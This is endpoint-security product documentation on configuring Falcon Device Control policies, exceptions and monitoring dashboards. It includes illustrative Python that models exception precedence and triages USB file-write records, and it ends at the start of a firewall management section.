If your host has an internal card reader and you are observing multiple Device Control events for it, this behavior is expected. Device Control detects each initialization of the internal reader, and the reader is re-initialized when an external device is plugged in again or when the endpoint wakes from sleep mode, so each of those occasions produces an event.

Configure PCIe Device Control settings

Configure PCIe settings, which apply to internal SD card readers and external Thunderbolt mass storage devices.

Note: PCIe settings are available only for Windows or Mac sensor version 7.29 or later. For Windows, PCIe settings apply only to internal SD card readers and hosts. For Mac, PCIe settings apply to both internal SD card readers and external Thunderbolt mass storage devices.

While PCIe devices have a dedicated monitoring mode and access permissions, PCIe settings for metadata collection and access restriction notifications are shared with USB devices for a particular policy.

Note: SD cards that are plugged into a USB external SD card reader will continue to be controlled by USB device settings.
  1. Go to Endpoint security > Device control > Device policies.

  2. From the Platform menu, select your platform.

  3. Edit or create a policy.

    • To edit a policy, click the policy name.

    • To create a policy, click Create policy, enter a name, and then click Create policy.

  4. On the Settings tab, select the PCIe mode to use.

  5. Optional. Enable metadata collection and notifications in the USB and PCIe area.

    1. Select Enhanced file metadata collection.

    2. Select End-user notifications.

    3. For the Access restriction notification setting, select whether to show the default message or a custom message. If needed, enter a custom message.

      Note: The Full block notification setting doesn’t apply to internal SD card readers or external Thunderbolt mass storage devices.

    4. Click Save.

  6. Click the PCIe devices tab.

  7. Expand the Mass Storage section.

  8. On the SD cards tab, select the permission level.

  9. For Mac policies, click the Thunderbolt tab and select the permission level.

  10. Click Save.

Device Control policy exceptions

You can create exceptions for USB and Bluetooth devices to override the standard behavior of a policy.

For example, you might create a policy that blocks all USB mass storage devices, then create exceptions for the specific USB devices that are issued and approved by your organization. Exceptions are based on:

  • device class or subclass
  • vendor source
  • vendor ID (VID)
  • product ID (PID)
  • serial number
Note: Bluetooth devices do not have serial numbers. USB devices do not have vendor sources.

You can set an exception's permissions to the same level as its class's permissions. The exception keeps its own permissions: if the class's permissions are changed later, the exception's permissions do not change with them.

Exceptions are applied according to the following precedence from highest to lowest:

  1. Vendor ID, Product ID, and Serial number
  2. Vendor ID and Product ID only
  3. Vendor ID and a specific device class
  4. Vendor ID only
  5. Device class or minor class only
Note: When you use manual entry, exceptions that include more information automatically override exceptions that contain less information.

When entering a vendor name or product name, you might find an entry that corresponds to an incorrect vendor ID or product ID. When Falcon looks up vendor and product names, it checks several third-party lists. You may update the vendor and product names to your own custom values. As long as the vendor source, vendor ID, product ID and/or serial number match the device, the exception works as expected.

Note: Policy exceptions are not supported for internal SD card readers or external Thunderbolt mass storage devices.
Configure an exception for a USB device class

To create exceptions at the device class level, follow these steps.

  1. Go to Endpoint security > Device control > Device policies.

  2. Go to the USB devices tab.
  3. Click to expand the USB device class you want.
  4. Click Add exception.
  5. Choose the method for creating the exception using a USB device's Combined ID or Manual entry.
    • Combined ID:
      1. Enter the combined ID.
      2. Confirm the device class selection.
      3. Choose the permission level.
      4. Optional. Select whether to make the exception temporary. For more information, see Temporary exceptions.
      5. Optional. Enter a description.
    • Manual entry:
      1. Enter the Vendor ID and Vendor name.
        Note: If your vendor isn’t available in the dropdown, you can enter a custom vendor name. The vendor name doesn’t affect the exception's functionality.
      2. If available, enter a Product ID and Product name.
        Note: If the product name isn’t available in the dropdown, you can enter a custom product name. The product name doesn’t affect the exception's functionality.
      3. Optional. To allow the use of wildcards in serial numbers, select Allow wildcards.
        Note: This feature is available for macOS and Windows sensor 6.56 and later. For more information, see Use wildcards to include multiple USB devices.
      4. Enter a device serial number, or enter a wildcard value in glob syntax to include a range of serial numbers. Accepted glob syntax includes *, ?, and []. To escape a wildcard character, enclose it in square brackets, for example [*]. For more info, see Glob Syntax.
      5. Optional. To confirm that the wildcard works as expected, enter a sample serial number value in the Serial Number for Glob Pattern Test field and click Test.
      6. Confirm the device class selection.
      7. Select the permission level.
      8. Optional. Enter a description.
      9. Optional. Select to make the exception temporary and enter an end date and time.
  6. Click Add exception.
  7. Click Save and then click Save again to confirm.
Temporary exceptions
Temporary exceptions expire at a scheduled end date and time and are then automatically deleted from the policy. They are scheduled in local time in the UI, but if using Device Control Policy APIs, they should be scheduled in UTC. The date and time set is when the channel file update is sent to the sensor to remove the exception. Depending on your policy update settings, it might take some time before an expired exception is no longer in effect.
Note: When viewing policy exceptions, the End time column that shows a temporary exception’s expiration date and time is not visible in the table by default. You can enable the column header from the Toggle table column menu in the upper-right corner of the table.
Use wildcards to include multiple USB devices
If your serial numbers follow a predictable pattern, you can use a wildcard value to add multiple devices to a policy exception and reduce the total number of exceptions you’ll need to create. To enable the use of glob wildcards and match patterns in text strings, select the Manual Entry option.
Note: There is a limit of 15,000 exceptions per (USB) policy. We recommend reducing your exception count by using wildcard serial numbers whenever possible.
Configure an exception for a Bluetooth device class
Note: Bluetooth devices might have a Vendor ID assigned with a vendor source of either USB or Bluetooth. Exceptions added using the dashboard located at Endpoint security > Device control > Activity automatically populate the vendor source when it is available. We recommend using this dashboard to add exceptions when possible.

To create exceptions at the device class level, follow these steps.

  1. Go to Endpoint security > Device control > Device policies.

  2. Go to the Bluetooth devices tab.
  3. Expand the Bluetooth device class you want.
  4. Click the Exceptions tab for your device class.
  5. Click Add exception.
    1. Enter the Vendor source.
      Note: The vendor source field designates which organization assigned the value used in the Vendor ID field, usually either the Bluetooth SIG or the USB Implementers Forum. In Device Control, these options appear as Bluetooth or USB in the Vendor source dropdown. For more info, see section 3.9.1.1 of the Bluetooth Device Information Service 1.1 specification. If you are unsure of the vendor source, choose Any.
    2. Enter the Vendor ID and Vendor name.
      Note: If your vendor isn’t available in the dropdown, you can enter a custom vendor name. The vendor name doesn’t affect the exception's functionality.
    3. If available, enter a Product ID and Product name.
    4. Confirm the device class and minor class selection.
    5. Select the permission level.
    6. Optional. Enter a description.
    7. Optional. Select to make the exception temporary and enter an end date and time.
  6. Click Add exception.
  7. Click Save and then click Save again to confirm.
Configure an exception based on event type

To create exceptions at the individual event level, follow these steps.

  1. Go to Endpoint security > Device control > Activity.
  2. On the Device control tab, locate the event to use and click .
  3. Select Add exception.
  4. Select the device class to include.
  5. Choose the permissions.
  6. Optional. Select to make the exception temporary and enter an end date and time.
  7. Enter a description.
  8. Click Add to policy.
Configure a CID-wide USB device exception

CID-wide device exceptions apply to the entire CID they’re created for, regardless of platform. They always override policy-specific exceptions. Only USB CID-wide device exceptions are supported at this time. CID-wide exceptions follow the enforcement mode of the Device Control policy the host is assigned to. For example, if a host’s policy is set to Off, the CID-wide exception will not apply.

You can create a CID-wide exception based on a combined ID from the Device Control dashboard, or manually create one by adding device information.

To create exceptions at a CID-wide level, follow these steps.

  1. Go to Endpoint security > Device control > Device policies.
  2. Click the CID-wide exceptions tab.
  3. Click Add exception.
  4. Select Combined ID or Manual entry.
    1. If you select Combined ID, add the Combined ID.
    2. If you select Manual entry, add the device information. For more info about manual entry, see Configure an exception for a USB device class.
  5. Select the Device class and Permissions.
  6. Add a Description.
  7. Click Add exception to save.
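As an added example (not CrowdStrike code) tying together the exception precedence list, glob-pattern serial numbers, and CID-wide exceptions described above, here is a small Python model that resolves the effective permission for one connecting USB device. The class and field names, VIDs, PIDs and serials are constructed placeholders, and the five documented precedence levels are encoded as a sort key in which an exception carrying more identifying fields beats one carrying fewer.

```python
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from typing import Optional

MASS_STORAGE = "Mass Storage"
# Permission levels as named in the policy UI; Read only and Read and write only are mass-storage-only.
PERMISSIONS = ("Full access", "Read only", "Read and write only", "Full block")


def serial_matches(pattern: str, serial: str) -> bool:
    """Literal or glob (*, ?, []) match of a serial number; [*] matches a literal *."""
    return fnmatchcase(serial, pattern)  # assumption: serials compare case-sensitively


@dataclass(frozen=True)
class Device:
    device_class: str
    vendor_id: str  # VID and PID as shown in the Activity dashboard (constructed below)
    product_id: str
    serial: str


@dataclass(frozen=True)
class UsbException:
    permission: str
    device_class: Optional[str] = None  # None models a vendor-only exception
    vendor_id: Optional[str] = None
    product_id: Optional[str] = None
    serial_pattern: Optional[str] = None  # literal serial or glob pattern

    def __post_init__(self) -> None:
        if not (self.device_class or self.vendor_id):
            raise ValueError("an exception needs a device class or a vendor ID")
        if self.permission not in PERMISSIONS:
            raise ValueError(f"unknown permission {self.permission!r}")
        if self.permission in PERMISSIONS[1:3] and self.device_class != MASS_STORAGE:
            raise ValueError(f"{self.permission!r} is valid only for {MASS_STORAGE}")

    def matches(self, dev: Device) -> bool:
        exact = ((self.device_class, dev.device_class), (self.vendor_id, dev.vendor_id),
                 (self.product_id, dev.product_id))
        return (all(want is None or want == got for want, got in exact)
                and (self.serial_pattern is None
                     or serial_matches(self.serial_pattern, dev.serial)))

    def precedence_key(self) -> tuple:
        """Sorts most specific first: VID+PID+serial, VID+PID, VID+class, VID, class."""
        return (self.serial_pattern is None, self.product_id is None,
                self.vendor_id is None, self.device_class is None)


@dataclass
class Policy:
    mode: str  # "Off", "Monitor only" or "Monitor and enforce"
    class_permissions: dict  # device class -> permission used when no exception matches
    exceptions: list = field(default_factory=list)
    cid_wide_exceptions: list = field(default_factory=list)  # always beat policy exceptions


@dataclass(frozen=True)
class Decision:
    configured: str  # what the policy says about this device
    enforced: str    # what the host applies once the policy mode is taken into account
    monitored: bool  # True when the event would appear on the Monitoring policy dashboard
    source: str      # "cid-wide", "policy exception", "class" or "policy off"


def evaluate(policy: Policy, dev: Device) -> Decision:
    if policy.mode == "Off":  # nothing applies, CID-wide exceptions included
        return Decision("Full access", "Full access", False, "policy off")
    configured, source = policy.class_permissions.get(dev.device_class, "Full access"), "class"
    for pool, label in ((policy.cid_wide_exceptions, "cid-wide"),
                        (policy.exceptions, "policy exception")):
        hits = sorted((e for e in pool if e.matches(dev)), key=UsbException.precedence_key)
        if hits:
            configured, source = hits[0].permission, label
            break
    if policy.mode == "Monitor and enforce":
        return Decision(configured, configured, False, source)
    # Monitor only: the device is allowed, and a block that would have happened is logged.
    return Decision(configured, "Full access", configured != "Full access", source)


# Constructed sample data: VIDs, PIDs and serials are placeholders, not real devices.
SAMPLE_POLICY = Policy(
    mode="Monitor and enforce",
    class_permissions={MASS_STORAGE: "Full block", "Imaging": "Full access"},
    exceptions=[
        UsbException("Read only", MASS_STORAGE, vendor_id="1234"),  # approved vendor
        UsbException("Full access", MASS_STORAGE, vendor_id="1234",  # issued fleet
                     product_id="5678", serial_pattern="CORP-2024-*"),
    ],
    cid_wide_exceptions=[
        UsbException("Full block", MASS_STORAGE, vendor_id="1234",  # reported lost
                     product_id="5678", serial_pattern="CORP-2024-0099"),
    ],
)
FLEET_STICK = Device(MASS_STORAGE, "1234", "5678", "CORP-2024-0001")
VENDOR_STICK = Device(MASS_STORAGE, "1234", "9999", "X-1")
LOST_STICK = Device(MASS_STORAGE, "1234", "5678", "CORP-2024-0099")
UNKNOWN_STICK = Device(MASS_STORAGE, "abcd", "0001", "ZZZ")
```

evaluate(SAMPLE_POLICY, LOST_STICK) returns Full block from the CID-wide exception even though both policy exceptions would allow the device, and the same policy in Monitor only mode reports the same decision as monitored rather than enforced.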

Monitor Device Control activity

Depending on your primary Falcon subscription, Device Control provides several dashboards in the Falcon console that enable you to review USB and Bluetooth device connection events in your environment.

  • Activity
  • Device usage (Falcon Insight XDR only)
  • Device usage by host (Falcon Insight XDR only)
  • Device blocks (Falcon Insight XDR only)
  • Files written to devices overview (Falcon Insight XDR only)
  • Files written to USB
  • Monitoring policy (Falcon Insight XDR only)
  • Mac Bluetooth device usage (Falcon Insight XDR only)
  • Mac Bluetooth device blocks (Falcon Insight XDR only)
  • Mac Bluetooth device monitoring policy (Falcon Insight XDR only)

To download any of these dashboards, click Export.

Activity dashboard

Go to Endpoint security > Device control > Activity.

This dashboard provides a list of all instances of supported removable and Bluetooth devices connecting to hosts in your environment. Click an event to open a detailed view that includes the following information:

  • Details about the device, such as its device name, vendor name, and IDs

  • Details about the specific host the device attempted to connect to

  • The action taken (allowed or blocked)

  • The associated Device Control policy

Note: You can add a policy exception from this location for USB and Bluetooth devices. For more information, see Configure an exception based on event type.

You might see an event with Event Type of Device Not Supported on the Activity dashboard.

This event type means an external device that is potentially incompatible with the Device Control module was detected. As a result, Device Control can't take any actions on the device. An associated event is logged in the Falcon console for visibility.

Also, the device might run into compatibility or other issues that prevent it from functioning correctly. If such an issue occurs, contact Support for further investigation and possible remediation.

For Mac hosts running Sonoma and later, Apple requires the end user to authorize third-party applications to access Bluetooth. This permission cannot be managed by MDM. The Bluetooth permissions tab lists the Bluetooth authorization status of these Mac hosts. If an end user hasn’t granted Falcon the required permission to apply your Device Control policies, an admin will not be able to view Bluetooth events for that host or apply Bluetooth policy to it. Click an event to view more information about the event and its associated policy.
Note: Bluetooth support is only available for macOS.
Device usage

Discover information about supported devices in your environment at Endpoint security > Device control > Device usage. If you have Device Control with Falcon Pro or Falcon Prevent without Insight, go to Endpoint security > Device control > Activity.

The Device Usage dashboard shows all device activity in your environment. To narrow the results, add filters based on any of the available fields. Depending on the size of your environment, changing the time range can result in a search that takes some time to complete.
Note: This search feature doesn’t support wildcard serial numbers.

You'll also use this information when you create exceptions in USB device policies. When creating exceptions, you identify USB devices by their vendor IDs (VIDs), product IDs (PIDs), and serial numbers. We recommend using the USB device dashboards to get accurate information, but you can also use another source of USB devices' VIDs, PIDs, and serial numbers.

Device events

To view removable device events, go to Endpoint security > Device control > Device usage.

By default, the Device usage dashboard shows all instances of supported devices connecting to your hosts. You can filter these events with the filter bar at the top.

Filter options on this dashboard:

  • Policy mode
    • Enforce: view events associated with policies set to Monitor and Enforce mode
    • Monitor only: view events associated with policies set to Monitor only mode
    A value of N/A indicates that the removable device was allowed to connect (the Full access permission).
  • Permissions: View events that resulted in a selected action, based on the Permission setting in your Device Control policy. Read only and Read and write only appear only for devices with the mass storage device class.
  • Policy name: View events associated with a specific Device Control policy. A value of N/A indicates that the removable device was allowed to connect (the Full access permission).
  • Device class: The device class of the device. This is set by the device manufacturer.
  • Vendor name: The manufacturer of the removable device. This is set by the device manufacturer.
  • Product name: The product name for the device. This is set by the device manufacturer.
  • Event type: View whether the device was connected or blocked.
  • Event time: The time the device attempted to connect. This time is recorded in UTC but displayed according to your user profile’s time setting.

Device Usage by Host

Use this dashboard to view all of the supported devices that are associated with a single host. Enter a host name to view its history. To view this dashboard, go to Endpoint security > Device control > Device usage by host.

Device blocks dashboard

This dashboard shows instances of devices that were blocked by a Device Control policy set to Full Block on any host in your environment. Instances of mass storage devices using policies set to Read only or Read and write only aren't included. This dashboard helps you determine whether your Device Control policies are blocking devices as intended. To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed. To view this dashboard, go to Endpoint security > Device control > Device blocks.

Monitoring Policy Dashboard

The Monitoring Policy dashboard shows instances of supported removable devices that match a Device Control policy set to Monitor only. These devices were allowed to connect to a host, but if your policy was set to Monitor and enforce, they would have been blocked. This dashboard helps you test a Device Control policy without affecting users and hosts. To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed. To view this dashboard, go to Endpoint security > Device control > Monitoring policy.

Mac bluetooth device usage dashboard

If you have Device Control with Falcon Insight XDR, go to Endpoint security > USB device control > Mac bluetooth device usage.

The Mac Bluetooth device usage dashboard shows all Bluetooth device activity on your Mac hosts. To narrow the results, add filters based on any of the available fields. Depending on the size of your environment, changing the time range can result in a search that takes some time to complete.

Mac bluetooth device blocks dashboard

This dashboard shows instances of devices that were blocked by a device policy set to Full Block on any host in your environment. This dashboard helps you determine whether your device policies are blocking Bluetooth devices as intended. To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed.

To view this dashboard, go to Endpoint security > Device control > Mac bluetooth device blocks.

Mac bluetooth monitoring policy dashboard
The Mac bluetooth monitoring policy dashboard shows instances of Bluetooth devices that match a policy but weren’t blocked because the policy is set to Monitor only. If the policy is set to Monitor and enforce, these devices would be blocked. Use this dashboard to determine how Bluetooth settings affect users and hosts before you enforce those settings.
Note: To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed.

To view this dashboard, go to Endpoint security > Device control > Mac bluetooth monitoring policy.

Files written to removable media overview

The Files written to removable media overview dashboard shows files that have been written to removable devices, which helps you identify the specific files written from a host. To view this dashboard, go to Endpoint security > Device control > Files written to removable media overview. To narrow your results, use the File Type drop-down list.

The following file types are reported in the Files written to devices overview dashboard.

File categories and the file types within each:

  • File Archive: 7Zip, ARC, ARJ, BZ2, CAB, DEB, GZIP, JAR, RAR, RPM, TAR, XAR, ZIP
  • Document: DOCX, MS DOCX, MS PPTX, MS XLSX, MSVSDX, OLE, OOXML, PDF, PPTX, RTF, VSDX, XLSX
  • Design: DWG, DXF, IDW
  • Multimedia: BMP, GIF, JPEG, PNG, TIFF
  • Source Code: SCRIPT
  • Executable: CAB, CLASS, ELF, MACHO, MSI, PE
  • Virtual Machine: VDI, VMDK
  • Email: EMAIL, EMAILARC, EML, MSG, OST, PST
  • Data and Logs: BLF, DMP, ESE
  • Other: DMGLNK

You can narrow your search by entering a computer name, user name, file path or name, file type, or company. Depending on the size of your environment, changing the time range can result in a search that takes some time to complete.

Files written to USB dashboard

Available to Falcon Prevent and Falcon Insight XDR customers with Device Control, the Files written to USB dashboard provides detailed information about file activity with contextual metadata that enables you to investigate potential data exfiltration events. File written data is retained for 30 days.

Note: This dashboard does not support file write details for internal SD card readers or Thunderbolt mass storage devices.

To enable this feature, go to Endpoint security > Device control > Device policies and turn on Enhanced file metadata collection. Consider these points when using this feature:

  • Enabling the Enhanced file metadata collection feature initiates three Falcon sensor servlet containers on managed hosts. We recommend testing the feature within your environment before enabling it on hosts with very high I/O workloads.
  • Although Enhanced file metadata collection applies to both USB and PCIe mass storage devices and is viewable in Event Search, the Files written to USB dashboard shows only files written to USB mass storage.

To view the Files written to USB dashboard, go to Endpoint security > Device control > Files written to USB.

Filter options on this dashboard:

  • Date Written: Date and time of the file write event
  • Filename: Full name of the file written
  • Given File Extension: Extension of the file written
  • Identified file type: File type based on file structure and content analysis
  • Identified file category: Identified file category, such as archive, document, or multimedia
  • Host filepath: The full source file path detected on the managed host
  • USB device: USB device type
  • Combined ID: USB device unique identifier
  • Username: Identified user attached to the file write event
  • Hostname: Name of the host where the file write event was observed

Note: There might be a short delay in the availability of file provenance data for new files transferred onto removable media.

Use the search feature to narrow your results. Search by computer name, username, file path or name, file type, or company. Depending on the size of your environment, changing the time range can impact how quickly results are displayed.
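As an added example (not CrowdStrike code) of what to do with the fields above once records are exported or pulled from Event Search, the following Python applies a few review rules to file write records: a given extension whose expected category differs from the identified (content-based) category, executables written to USB, and whole mailbox stores. The record layout, the combined ID format, and all sample events are constructed for this example.

```python
from collections import Counter
from dataclasses import dataclass

# Given extension -> category the dashboard would report for a file whose content matches
# its name. Drawn from the file category table above; extend as needed.
EXPECTED_CATEGORY = {
    "zip": "Archive", "7z": "Archive", "rar": "Archive", "tar": "Archive", "gz": "Archive",
    "docx": "Document", "xlsx": "Document", "pptx": "Document", "pdf": "Document",
    "jpg": "Multimedia", "jpeg": "Multimedia", "png": "Multimedia", "gif": "Multimedia",
    "exe": "Executable", "dll": "Executable", "msi": "Executable",
    "vmdk": "Virtual Machine", "vdi": "Virtual Machine",
    "pst": "Email", "ost": "Email", "eml": "Email", "msg": "Email",
}


@dataclass(frozen=True)
class FileWrite:
    """One row of the Files written to USB dashboard (field names follow the filter table)."""
    date_written: str
    filename: str
    given_extension: str
    identified_type: str
    identified_category: str
    host_filepath: str
    combined_id: str
    username: str
    hostname: str


@dataclass(frozen=True)
class Finding:
    rule: str
    event: FileWrite
    detail: str


def triage(ev: FileWrite) -> list:
    """Apply the review rules to one file write event and return the findings."""
    findings = []
    expected = EXPECTED_CATEGORY.get(ev.given_extension.lower())
    if expected and expected != ev.identified_category:
        findings.append(Finding("extension-mismatch", ev,
                                f".{ev.given_extension} suggests {expected}, content is "
                                f"{ev.identified_type} ({ev.identified_category})"))
    if ev.identified_category == "Executable":
        findings.append(Finding("executable-to-usb", ev, f"{ev.identified_type} binary written"))
    if ev.identified_type in ("PST", "OST"):
        findings.append(Finding("mailbox-store-to-usb", ev, "whole mailbox store copied"))
    return findings


def triage_all(events) -> list:
    return [finding for ev in events for finding in triage(ev)]


def files_per_session(events) -> Counter:
    """Files written per (combined ID, username): the grouping the Related USB session view uses."""
    return Counter((ev.combined_id, ev.username) for ev in events)


# Constructed sample events; combined IDs, hosts, users and paths are placeholders.
SAMPLE_EVENTS = [
    FileWrite("2026-03-29T08:12:03Z", "Q1-report.docx", "docx", "MS DOCX", "Document",
              r"C:\Users\alice\Documents\Q1-report.docx", "1234_5678_CORP-2024-0001",
              "alice", "WS-01"),
    FileWrite("2026-03-29T08:13:40Z", "invoice.pdf", "pdf", "PE", "Executable",
              r"C:\Users\alice\Downloads\invoice.pdf", "1234_5678_CORP-2024-0001",
              "alice", "WS-01"),
    FileWrite("2026-03-29T09:01:11Z", "backup.zip", "zip", "ZIP", "Archive",
              r"C:\Users\bob\Desktop\backup.zip", "1234_9999_X-1", "bob", "WS-02"),
    FileWrite("2026-03-29T09:02:55Z", "outlook.pst", "pst", "PST", "Email",
              r"C:\Users\bob\AppData\Local\Microsoft\Outlook\outlook.pst", "1234_9999_X-1",
              "bob", "WS-02"),
]
```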

Click an event in the dashboard to view more detailed information.

Detailed view sections and the information each includes:

Related USB session
The Falcon sensor creates a unique session ID based on when the removable storage device was inserted.
  • files and data written during the session
  • date and time of the first file written
  • date and time of the last file written
Select View full session to show all files covered by the USB session.

File
  • file size
  • given file extension
  • identified file type
  • identified file category
  • SHA256
  • application writing the file
  • Microsoft Purview sensitivity label
Note: File source information is available for files under the C:\Users\ directory, which typically incorporates the library folders for all users.

Archive
This information is shown instead of file details when an archive file type is detected.
  • filename
  • file size
  • number of files in the archive
  • given file extension
  • identified file type
  • identified file category
  • SHA256
  • application writing the file
  • Microsoft Purview sensitivity label
Select View filenames to view more details about individual files contained in the archive. You can export these details to a CSV file.

USB device
  • device type
  • date and time device first seen
  • device class
  • vendor
  • device serial number and combined ID
For disk images, which can function as a USB device on macOS, the following fields are available:
  • Disk Image Path
  • GUID
  • BSD device

User
  • username
  • user ID
  • logon type
  • logon time
  • logon server
  • logon domain

Host
  • operating system
  • IP address
  • local IP address
  • host ID
  • sensor version
  • containment status

Note: Archive file introspection for ZIP files is limited to the first 100MB of the ZIP file. If the archive includes more than 50 files, only the top 50 files, prioritized by file type and size, are scanned. File names might not be available for some password protected ZIP files.

Use Device Control events as workflow triggers

Orchestrate automated actions triggered by Device Control events in Falcon Fusion SOAR. To reach your workflows, go to Fusion SOAR > Fusion SOAR > Workflows.

To use a Device Control event as a workflow trigger, edit the trigger for an existing workflow or create a new workflow.

In the Add trigger panel:

  1. Select either Device control event or File written event and click Next.

  2. In the workflow, add conditions and actions based on the trigger’s event details and complete the workflow.

For more information, see Fusion SOAR.

Troubleshooting

If the Device Control policy isn't working as expected for a supported removable or Bluetooth device, follow these steps to troubleshoot the issue.

  1. On a Windows host, confirm that the sensor rebooted after an install or after the Device Control policy was enabled.
  2. Verify that the host belongs to a group with the Device Control policy assigned.
  3. Confirm that there isn’t a higher precedence policy assigned to the host's group.
  4. Confirm that the Device Control policy is enabled.
  5. Confirm that the Device Control policy is set to Monitor and enforce.
  6. Verify that the Device Control policy is configured to allow or deny access correctly.
  7. Confirm that there aren’t any exceptions which specify different behavior for that device class.
  8. Confirm that there isn’t a more specific exception applied to the host.
  9. Confirm that you entered a combined ID or manual entry in the correct device class.
  10. If you entered an exception with a combined ID, confirm that the combined ID is correct.
Vendor name or product name are incorrect

When entering a Vendor Name or Product Name, you might find an entry that corresponds to an incorrect Vendor ID or Product ID. When Falcon looks up vendor and product names, it checks several third-party lists.

Device not supported event type

You might see an event with an event type of Device not supported at Endpoint security > Device control > Activity.

This event type means an external device that is potentially incompatible with the Device Control module has been detected. As a result, the Device Control module can't perform any actions on the device, such as blocking or allowing the device. An associated event however is logged in the Falcon console for visibility.

The device might also run into compatibility or other issues that prevent it from functioning correctly. If such an issue occurs, contact Support for further investigation and possible remediation.

Additional errors

When an external storage device is connected to the host, the following dialog appears:

[Screenshot: macOS message that the disk you attached was not readable by this computer]

This popup is expected and occurs when device permissions are set to Full Block for Mass Storage devices. It appears because the file system could not be mounted due to the restrictions Device Control imposed.

When the Mass Storage permission is set to Read Only and you attempt to write to the external storage device, a username/password prompt appears. After you enter your credentials, the following dialog appears:

[Screenshot: macOS message that the items can't be copied because you don't have permission to read them]

The username/password prompt and the follow-up dialog are expected behavior for some applications. If the application is unable to write with the current user credentials, it requests alternative user credentials. This behavior is not controlled by Device Control; it is application-specific.

Falcon Firewall Management

Centrally manage the firewalls on your Windows and macOS hosts in the Falcon console.

Overview

Centrally manage the firewalls on your Windows, macOS, and Linux hosts from the Falcon console using Falcon Firewall Management, which is based on the Windows Filtering Platform (Windows) or the CrowdStrike platform (macOS and Linux). Secure your hosts from network threats by allowing or blocking network traffic in accordance with your organization’s policies.

Before you begin

Firewall policies are enforced on hosts by using host groups. For info about creating host groups, see Host and Host Group Management.

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.
Requirements

Subscription: Falcon Firewall Management

Sensor Support:

Windows

Falcon sensor for Windows version 6.33 and later. Sensor version 6.42 or later is required for wildcard support.

Note: If a Falcon firewall policy is applied to a host running an earlier sensor version, the host will have a firewall policy state of pending changes until it updates to a sensor that supports Falcon firewall management.

macOS

Linux

  • Sensor support: Falcon sensor for Linux version 7.27 and later, running in user mode

    Note: If a Falcon firewall policy is applied to a host running an earlier sensor version, the host will have a firewall policy state of pending changes until it updates to a sensor that supports Falcon firewall management.
  • Linux support: Supported Linux distros with Linux kernel 5.13 and later

    Note: Alma Linux, RHCK, RHEL, Rocky Linux require version 8.7 and later

Roles:

  • Firewall Manager: Create and edit firewall rules, assign firewall rule groups to firewall policies, and assign firewall policies to host groups.

    Note: The Firewall Manager role doesn’t include the ability to create and edit host groups themselves. The Falcon Administrator role is required for host group management.

  • These roles can view firewall rules, rule groups, policies, and audit logs:

    • Falcon Administrator

    • Falcon Analyst

    • Falcon Analyst - Read Only

    • Falcon Investigator

    • Falcon Security Lead

Understand Falcon Firewall Management

With Falcon Firewall Management, create firewall rules, rule groups, and policies to precisely define what network traffic is allowed and blocked. When enforced, Falcon’s firewall policies override the firewall settings on each assigned host.

Rules: Individual firewall rules define precise network traffic that is allowed or blocked and whether you want to see associated events in the console.

Rule groups: Use firewall rule groups to organize firewall rules. You can start with an empty group and build it out. If you need a template, you can duplicate an existing CrowdStrike template rule group and customize it to meet your needs. For more info, see CrowdStrike Core Windows Networking Firewall Rules.

Note: You do not need to add core networking rules to your firewall policies. They are provided as an example of a rule group. These rules are already added to every firewall policy by default.

Policies: Use policies to enforce firewall rules. You assign rule groups to a policy and then configure the policy to allow or block any remaining network traffic that is not defined by the rules in its rule groups.

  • Rule groups can be assigned to multiple firewall policies.

  • Firewall rule groups are enforced in the precedence order you define within a policy.

Firewall policies work like other Falcon policies:

  • They are applied to individual hosts through host groups.

  • Policy precedence handles situations where a host is assigned to more than one policy.

  • To affect assigned host groups, they must be enabled.

Implementation overview

Implementing a set of Falcon firewall rules and policy to secure your hosts from network threats involves these key steps:

Plan and prepare
  • Map your organization’s firewall requirements to Falcon Firewall Management rules.

  • Determine the network traffic you need to allow, block, and review.

  • Decide how you want to organize your rule groups.

  • Make sure you have host groups that are aligned with how you need to apply firewall policies.

Create firewall rule groups and rules
Test and Troubleshoot

We recommend you always test new firewall rules on a small set of test hosts, such as in a lab or QA environment, and start simple with a single rule group and policy. Be as specific as possible about the network traffic you allow, and block everything else. Test and troubleshoot to confirm the desired behavior before building out the policy or applying it to a production environment.

Falcon provides two options to report firewall events in Endpoint security > Firewall > Activity during testing:

  • At the individual rule level, turn on Watch mode to report all matching traffic.

  • At the policy level, temporarily turn on Monitor mode to allow traffic that would normally be blocked by the policy and report all associated events.

Rollout/Go Live
  • Build out your firewall rule groups, rules, and policies.

  • Assign policies to host groups.

  • Enable the policies.

Important: Improper implementation of firewall rules can cause a major issue that requires manual remediation. Always be aware of the potential impact Firewall rules might have on your environment.

CrowdStrike has certain safeguards in place to reduce the risk:

  • Protecting key connections between the Falcon sensor and cloud

  • Not blocking loopback connections

  • Including core rules in every firewall policy

Manage your firewall rules and rule groups

View your firewall rule groups and rules

Go to Endpoint security > Firewall > Rule groups to see your firewall rule groups.


Firewall rule groups page

Click the name of a rule group to view its details.

Create a firewall rule group

To begin setting up your organization’s firewall in Falcon console, create a rule group.

  1. Go to Endpoint security > Firewall > Rule groups.

  2. Click Create rule group.

  3. Enter a name, platform type, and description, and then click Create.


    Create rule group dialog
  4. There are 3 options to start a new firewall rule group. Start from scratch, duplicate an existing rule group, or choose a template. Select an option and click Create rule group.

    • Empty rule group: Makes a new group that contains no rules

    • Duplicate an existing rule group: Copies an existing firewall rule group and its firewall rules


      Duplicate an existing rule group
    • CrowdStrike preset rule group templates: Makes a rule group with our collection of core rules. For more info, see CrowdStrike Core Windows Networking Firewall Rules.


      Preset rule group templates tab
  5. Your firewall rule group is created, and you see the Rules tab of its Rule group details.

  6. Create or edit rules in the group. For more info, see:

Editing a firewall rule group’s basic info

You can edit the name, status, and description of a rule group at any time.

  1. Go to the Endpoint security > Firewall > Rule groups page and click the name of the rule group you want to edit.

  2. Configure the changes and click Save.

Create a firewall rule

The details of firewall settings are defined in individual rules, created within rule groups. To add a rule:

  1. Go to the Endpoint security > Firewall > Rule groups page.

  2. Click the name of the rule group where you’ll add the new rule.

  3. On the Rules tab, click Add rule.

  4. In the Add rule dialog, define the rule. For info about the fields, see firewall rule dialog fields.


    Screenshot of add rule dialog
